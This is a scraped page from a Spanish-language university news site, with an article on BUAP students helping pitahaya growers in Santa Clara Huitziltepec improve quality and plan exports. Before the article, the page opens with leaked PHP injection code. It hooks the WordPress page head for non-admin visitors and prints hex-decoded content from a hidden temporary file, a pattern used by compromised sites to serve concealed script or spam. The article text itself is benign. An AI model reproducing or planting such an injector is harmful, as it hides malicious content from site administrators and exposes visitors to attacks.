if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } A través del Extensionismo Universitario  mejoran  la calidad  de  la Pitahaya – La Opinión Universitaria La Opinión Universitaria
Menu

A través del Extensionismo Universitario  mejoran  la calidad  de  la Pitahaya

 

+ Santa Clara Huitziltepec    con plantaciones de pitahaya impulsadas  por Universitarios

En el zócalo de Santa Clara Huitziltepec hay un mural que simboliza más de lo que puede apreciarse a simple vista, en él resalta la mirada fija de una niña de piel morena que adorna su cabello con una pitahaya, fruta exótica que nace de una cactácea y que representa también los sueños de productores de la región, quienes han implementado un plan de negocios para que este fruto pueda ser exportado a otros países, gracias al apoyo de estudiantes de la BUAP del programa de Extensionismo Universitario.

Ubicado en la mixteca baja de Puebla y rodeada de imponentes cerros, Santa Clara Huitziltepec es una localidad donde casi el 80 por ciento de la población se dedica a la música, específicamente al mariachi; el resto son artesanos y productores en campos donde la tierra es seca casi todo el año, pero es justo esta característica la que permite que los cactus crezcan y ofrezcan hermosas flores que después se convertirán en dulces bocados, como la pitahaya con sus diferentes variantes, blanca, rosa y amarilla.

Al morder la “fruta más fashion del mundo”, como le llama Cristian Reyes Rojas, estudiante de la Licenciatura en Comercio Internacional de la BUAP y quien lidera al grupo de extensionistas universitarios, la pitahaya ofrece al gusto una sensación de frescura que invade, sus jugos llenan la boca, lo mismo que su dulzor y suavidad. Parece irónico que de una tierra tan árida pueda nacer esta fruta con gran cantidad de agua.

Cristian Reyes desborda entusiasmo, lo mismo platica con los productores de la región, que siembra un esqueje o escucha a sus compañeros con quienes ríe, planea y trabaja. Él asegura que la idea de impulsar la exportación de esta fruta nació de un proyecto escolar, pero que al investigar supieron del potencial que tiene para comercializarse en países como Japón, Portugal y Estados Unidos.

“Nos dimos cuenta del potencial que tiene, mis tíos son productores, entonces nos acercamos a la Universidad para pedir apoyo y como extensionistas nos vincularon con emprendimiento social. Así analizamos qué plan de negocios favorece la exportación y cómo mejorar su producción, porque no se trata de cualquier fruta, sino de un alimento considerado gourmet en otros países. Es la fruta más fashion del mundo”, asegura.

 

Conocida también como fruta dragón, la pitahaya (Hylocereus undatus) es valorada por sus propiedades antiinflamatorias, además es rica en antioxidantes, mucílagos, ácido ascórbico, vitaminas C y B, calcio, fósforo, hierro, proteína vegetal y fibra soluble. Sus semillas, que también son comestibles, contienen ácidos grasos benéficos.

La ingeniera Anaí López Reyes, del programa de Extensionismo Universitario de la Dirección de Innovación y Transferencia del Conocimiento (DITCo), destacó que el grupo de Cristian Reyes está conformado por siete estudiantes de las licenciaturas en Comercio Internacional, Comunicación y Diseño, a quienes se les vinculó con otros investigadores, como el doctor Jesús Muñoz Rojas del Centro de Investigaciones en Ciencias Microbiológicas del Instituto de Ciencias de la BUAP(ICUAP), a fin de consolidar su proyecto.

“El grupo se llama Nochtli, que en náhuatl significa fruta escamosa. Ellos llegaron con la intención de crear su plan de negocios y el área de Extensionismo Universitario los ubicó en incubación social. Su empresa tiene el modelo de cooperativa en la que participan más de 12 productores de esta región y los estudiantes brindan sus conocimientos para impulsar este proyecto”, indicó Anaí López.

No comments

Deja una respuesta

Tweets recientes